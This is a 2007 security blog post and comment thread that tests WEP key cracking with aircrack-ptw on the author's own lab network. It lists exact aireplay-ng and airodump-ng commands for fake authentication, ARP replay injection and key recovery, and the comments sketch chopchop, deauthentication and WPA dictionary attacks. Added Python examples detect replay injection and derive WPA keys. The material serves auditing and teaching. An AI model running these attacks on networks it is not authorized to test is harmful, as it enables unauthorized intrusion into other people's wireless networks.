April 05, 2007

What else do you need not to use WEP anymore?

Tonight (yeah, I know, I should get more sleep!), while I was working on a wireless project you will hear about soon, I read the announcement of a paper titled "Breaking 104 bit WEP in less than 60 seconds". I couldn't wait to digest and test it, so, impatiently, I prepared my wireless gear with the following setup:
  • A 104-bit WEP-based 802.11g wireless network, using a Linksys WRT54GL access point running OpenWrt.
  • A client laptop running Windows XP SP2 (with the Windows Wireless Update patch; come on, install it! ;)), using an Atheros wireless card.
  • An auditor laptop running BackTrack 2 Final and using an Atheros wireless card too.
My previous personal record for cracking 104-bit WEP was set with the old aircrack suite, which recovered the key after collecting around 100,000 valid frames. Very impressive, but I was very lucky that day: I only saw it happen once, and nowadays it typically takes me a minimum of 400,000 frames.

I downloaded the tool, aircrack-ptw, which implements the paper's improvements to derive the RC4 key used by WEP from as few as 40,000 frames (theoretically, around 60 seconds of captured traffic). I uncompressed and compiled the tool with a simple "make". However, before running "make" on BackTrack, be sure to edit the Makefile and move the "-lpcap" switch to the end of the gcc line for the "aircrack-ptw" target: the linker resolves symbols from left to right, so a library must be listed after the object files that reference it, or the pcap symbols come up undefined.

Atheros cards use the madwifi-ng driver by default, so you need to follow the fairly recent aircrack-ng WEP cracking tutorial step by step (it contains all the specific details you need to reproduce this test). The tool works on full frame captures (PCAP files), not IV-only files, so omit "--ivs" in Step 3, and in Step 5 run the new aircrack-ptw tool instead of the standard aircrack-ng.

Let's see a summary of my setup and the results I got (...in less than 60 seconds?):
  • Step 1 - Put the card in monitor mode.
  • Step 2 - Create a fake authentication from the auditor laptop:
    # aireplay-ng -1 0 -e TheMatrix -a 00:18:39:86:F2:55 -h 00:13:46:73:F2:99 ath0
    02:25:28 Sending Authentication Request
    02:25:28 Authentication successful
    02:25:28 Sending Association Request
    02:25:28 Association successful :-)
  • Step 3 - Run airodump-ng to collect the traffic:
    # airodump-ng -c 6 --bssid 00:18:39:86:F2:55 -w output ath0

    CH 6 ][ Elapsed: 1 min ][ 2007-04-05 02:29
    BSSID              PWR RXQ Beacons  #Data, #/s CH MB  ENC CIPHER AUTH ESSID
    00:18:39:86:F2:55   54 100     812  49547  585  6 48. WEP WEP         TheMatrix

    BSSID              STATION            PWR Lost Packets Probes
    00:18:39:86:F2:55  00:13:46:73:F2:99   63    0   26891
    00:18:39:86:F2:55  00:13:46:98:03:BB   64    0   25522
  • Step 4 - Capture and inject traffic in the form of ARP packets:
    # aireplay-ng -3 -b 00:18:39:86:F2:55 -h 00-13-46-73-F2-99 ath0
    Saving ARP requests in replay_arp-0405-022535.cap
    You should also start airodump-ng to capture replies.
    ...
  • Step 5 - With my setup, injecting 40,000 valid frames took between 65 and 75 seconds. My first try revealed the key with nearly 46,000 frames:
    # ./aircrack-ptw ../output-01.cap
    This is aircrack-ptw 1.0.0
    For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
    allocating a new table
    bssid = 00:18:39:86:F2:55 keyindex=0
    stats for bssid 00:18:39:86:F2:55 keyindex=0 packets=45937
    Found key with len 13: CA FE CA FE CA FE CA FE CA FE CA FE CA
    The result was not bad, but the paper and the tool promised much better. My second try only needed 42,000 frames, but that still meant more than 60 seconds:
    stats for bssid 00:18:39:86:F2:55  keyindex=0 packets=42648
    Third time's the charm: 38,653 frames and 59 seconds! ;)
    stats for bssid 00:18:39:86:F2:55  keyindex=0 packets=38653
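The ARP replay in Step 4 is also what a defender's wireless monitor should be looking for. aireplay-ng re-sends one captured, still-encrypted ARP request over and over, so the airodump-ng counters above show a single station producing hundreds of data frames per second, and every replayed frame carries the same 24-bit WEP IV, whereas normal traffic uses a fresh IV per frame. The following Python is an added example, not code from this post or from the aircrack-ng suite, of that detection logic run over constructed frame records; the record format, the thresholds and the sample traffic are assumptions made for the example.

```python
"""Flag WEP ARP-replay injection in an 802.11 frame feed (added example).

Not code from the original post or from the aircrack-ng suite. The ARP
replay in Step 4 retransmits one captured ARP request unchanged, so a
wireless monitor sees one station sending hundreds of data frames per
second that all carry the same 24-bit WEP IV, while legitimate traffic
uses a fresh IV per frame. The frame records below are constructed
sample data, not a real capture.
"""
from collections import Counter, defaultdict

# Thresholds are assumptions for this example; tune them for the monitored network.
RATE_THRESHOLD = 200       # data frames per second from a single station
REPEAT_THRESHOLD = 50      # identical (station, IV) pairs inside one window
WINDOW_SECONDS = 1.0


def detect_arp_replay(frames, rate_threshold=RATE_THRESHOLD,
                      repeat_threshold=REPEAT_THRESHOLD, window=WINDOW_SECONDS):
    """Return one alert per (station, time window) that looks like replay injection.

    Each frame is a dict with 'ts' (seconds, float), 'src' (station MAC),
    'iv' (24-bit WEP IV as an int) and 'len' (frame length in bytes).
    Both conditions must hold: a high data rate AND a heavily repeated IV,
    so a busy but honest station (fresh IVs) does not trip the alert.
    """
    buckets = defaultdict(list)
    for frame in frames:
        buckets[(frame["src"], int(frame["ts"] // window))].append(frame)

    alerts = []
    for (src, bucket), bucket_frames in sorted(buckets.items()):
        rate = len(bucket_frames) / window
        iv, repeats = Counter(f["iv"] for f in bucket_frames).most_common(1)[0]
        if rate >= rate_threshold and repeats >= repeat_threshold:
            alerts.append({
                "src": src,
                "window_start": bucket * window,
                "frames": len(bucket_frames),
                "iv": iv,
                "iv_repeats": repeats,
                "lengths": sorted({f["len"] for f in bucket_frames}),
            })
    return alerts


def constructed_frames():
    """Constructed sample traffic: one benign station with fresh IVs at
    20 frames/s, and one station replaying a single encrypted ARP request
    600 times within one second (same IV, same length). The MAC addresses
    are the two stations shown in the airodump-ng output of the post."""
    frames = []
    for i in range(40):                       # benign: t = 0.00 .. 1.95 s
        frames.append({"ts": i * 0.05, "src": "00:13:46:98:03:BB",
                       "iv": 0x100000 + i, "len": 120 + (i % 7)})
    for i in range(600):                      # replay burst: t = 1.0 .. 2.0 s
        frames.append({"ts": 1.0 + i / 600, "src": "00:13:46:73:F2:99",
                       "iv": 0xABCDEF, "len": 68})
    return frames


if __name__ == "__main__":
    for alert in detect_arp_replay(constructed_frames()):
        print(f"{alert['src']} at t={alert['window_start']:.0f}s: "
              f"{alert['frames']} frames, IV {alert['iv']:06x} repeated "
              f"{alert['iv_repeats']} times, frame lengths {alert['lengths']}")
```

On the constructed input only the replaying station is reported (one alert for the 1 s window, IV repeated 600 times, a single frame length); the benign station, with 20 frames/s and unique IVs, stays quiet. A real monitor would read the IV and source from the 802.11 data frames of a monitor-mode capture instead of the dict records used here.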
Awesome results and advancements for auditing the security of WEP-based wireless networks!

<plug> You can learn about this and other advanced wireless security techniques in the upcoming SANS Assessing and Securing Wireless Networks course in Brussels, June 25-30, 2007. </plug>

What else do you need to switch to WPA/WPA2? Vendors have no excuse not to implement WPA in every wireless device in 2007!!

UPDATE: This was "Breaking 104-bit WEP in less than 60 seconds". Check the next blog entry for breaking 40-bit WEP in less than...


4 Comments:

Anonymous said...

Authentication and association (step 2) works fine in open-wep mode. It doesn't work on shared-wep mode ;)... In this case I performed Korek chopchop attack with aireplay-ng -4 -h mac_address ath0, recover RC4 keystream, generate forged arp request with arpforge-ng ;). Wep is unbreakable with Airdefense wep cloaking technology http://www.tmcnet.com/usubmit/2007/04/02/2457867.htm. WPA-PSK (TKIP) and WPA2-PSK (AES) is also breakable... ;) with aireplay-ng -0 10 bla,bla I performed deauthentication and deassociation, capture WPA challenge/response authentication packets with airodump, and finally crack the challenge/response with cowpatty or aircrack-ng -a 2.... genpmk drastically help to precompute PMK to crack WPA (with cowpatty).

1:45 PM  
Raul Siles said...

Hi anon,
Thanks for your comment!

It is true that the example only works for open-auth WEP-based networks. If the WEP network uses shared authentication, then you need to obtain PRGA in order to encrypt the challenge sent by the AP. There are multiple ways of getting PRGA, one is the Korek chopchop attack you mention, but you can also use a WEP-based fragmentation attack or the simplest method, wait for (or force) a valid client to connect to the network: airodump-ng will collect the PRGA required for you ;)

If you are interested in the details, check the aircrack-ng tutorial called "How to do shared key fake authentication?".

Re the recently announced Airdefense WEP Cloaking feature, I strongly suggest that everybody read the following article by my good friend Joshua Wright, "AirDefense Perpetuates Flawed Protocols". You cannot secure WEP!! There are so many flaws in it that the smarter option for real security is to switch to WPA/WPA2. I know there are environments where this change would be too costly, but then, accept that a dedicated attacker will be able to break in.

Finally, re WPA/WPA2-PSK cracking, the current attack methods are based on dictionary attacks, trying to guess the pre-shared key if it is based on a dictionary word or is guessable. This is why the 802.11i specification recommends passphrases of 20 chars or more, and I suggest using 64-char random passphrases, such as the ones generated by GRC's password generator. If you don't trust Steve Gibson, mix the characters obtained from multiple invocations ;)

2:12 PM  
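The exchange above (the PMK precomputation with genpmk in the first comment, and the dictionary-attack and random-passphrase points in the reply) comes down to one function: WPA/WPA2-Personal maps the passphrase and the SSID to the 256-bit PMK with PBKDF2-HMAC-SHA1 at 4096 iterations, so an attacker can only try candidate passphrases one by one, and a long random passphrase is outside any dictionary. The Python below is an added example, not code from this post or from aircrack-ng, coWPAtty or genpmk; it derives the PMK, checks it against the IEEE 802.11i Annex H test vector ("password"/"IEEE"), and generates a passphrase from the OS CSPRNG. Note that the passphrase form of the key is 8 to 63 printable ASCII characters, while a 64-hex-digit value is the raw PSK itself, so the generator here stops at 63. The character set and the helper names are the example's own choices.

```python
"""WPA/WPA2-PSK passphrase handling (added example).

Not code from the original post or from the tools named in the comments
(aircrack-ng, coWPAtty, genpmk). WPA-Personal derives the PMK as
PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes); that is
what genpmk precomputes per SSID and what a dictionary attack evaluates
for each candidate. A uniformly random 63-character passphrase has far
more entropy than any wordlist can cover.
"""
import hashlib
import math
import secrets
import string

PBKDF2_ITERATIONS = 4096   # fixed by IEEE 802.11i for WPA-Personal
PMK_LENGTH = 32            # 256-bit PMK
# 94 printable ASCII characters (space excluded); an example choice, any
# printable ASCII set is valid for the 8..63 character passphrase form.
ALPHABET = string.ascii_letters + string.digits + string.punctuation


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Passphrase -> PMK mapping of WPA/WPA2-Personal (PBKDF2-HMAC-SHA1)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LENGTH)


def random_passphrase(length: int = 63) -> str:
    """Random passphrase from the OS CSPRNG; 63 is the longest the passphrase form allows."""
    if not 8 <= length <= 63:
        raise ValueError("length must be between 8 and 63")
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def entropy_bits(length: int, alphabet_size: int = len(ALPHABET)) -> float:
    """Guessing entropy of a uniformly random passphrase of the given length."""
    return length * math.log2(alphabet_size)


if __name__ == "__main__":
    # IEEE 802.11i Annex H test vector: passphrase "password", SSID "IEEE"
    print("PMK(password, IEEE) =", derive_pmk("password", "IEEE").hex())
    passphrase = random_passphrase()
    print(f"{passphrase}  ({entropy_bits(len(passphrase)):.0f} bits)")
    print(f"20-char random passphrase: {entropy_bits(20):.0f} bits")
```

The test vector should come out as f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e; the 4096-iteration cost is the same for the legitimate client and for every candidate an attacker tries, which is why coWPAtty users precompute per-SSID tables and why that precomputation buys nothing against a random passphrase.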
Anonymous said...

Good article by Joshua but I think he is agreeing that WEP cloaking works in at least one case. Or, is it really possible to decipher in spite of WEP cloaking?

10:22 AM  
Raul Siles said...

The real situation nowadays is that we are all waiting to have access to a packet capture for the WEP Cloaking countermeasures, because it seems relatively easy to discern between the real WEP packets and the ones generated by the protection system (sequence numbers, signal levels...).

It seems that even AirDefense comments on the SF WiFiSec list a few months ago ratified that, because they clarified WEP Cloaking is an extra layer of security for its WiFi defense-in-depth architecture.

11:03 AM  

